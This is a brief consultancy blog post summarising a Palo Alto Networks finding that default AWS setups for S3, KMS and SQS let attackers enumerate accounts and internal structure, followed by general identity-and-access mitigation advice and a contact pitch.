Amazon Web Services (AWS) is a popular cloud service used in many companies around the world. Having business processes and operations shifted to the cloud has proven beneficial to organisations, as it cuts costs involved in the infrastructure setup of a business.
AWS provides businesses with a variety of services using API (Application Programing Interface), with internal and external applications based on its service setup. This seems to be a great asset for businesses, however the default setup by AWS has some vulnerabilities that could escalate to bigger risks or threats in the future.
The Palo Alto network discovered this vulnerability, and have advised that it could allow threat actors and hackers to obtain account rosters and internal structures of organizations, and assist hackers to plan an attack in order to obtain the AWS ID, which can give them access to the entire system.
The services which provide this vulnerability are the following:
- Amazon Simple Storage Service (S3)
- Amazon Key Management Service (KMS)
- Amazon Simple Queue Service (SQS)
Using the Amazon ID account, hackers can find out if an employee account has access to certain resources, and from there they could work their way up to an Amazon account that could potentially provide root access.
Given enough time, the threat actors or hackers can also launch a brute force attack. This can occur because the access error messages are logged into the attackers account, which will make it harder to be aware of failed attempts to access certain resources by the organization.
Mitigation is possible, but it stands within the responsibilities of the organization, as there must be a strong Identity and Access management policy and framework. Another mitigation action that businesses could apply is cooperation with the vendor (Amazon), by ensuring their services are updated and configured according to certain secure plans. Both parties have a responsibility to secure their infrastructure.
For more information on securing your system and best cyber-management and cybersecurity planning, contact us.
Author: Saeed Baayoun, Agilient Consultant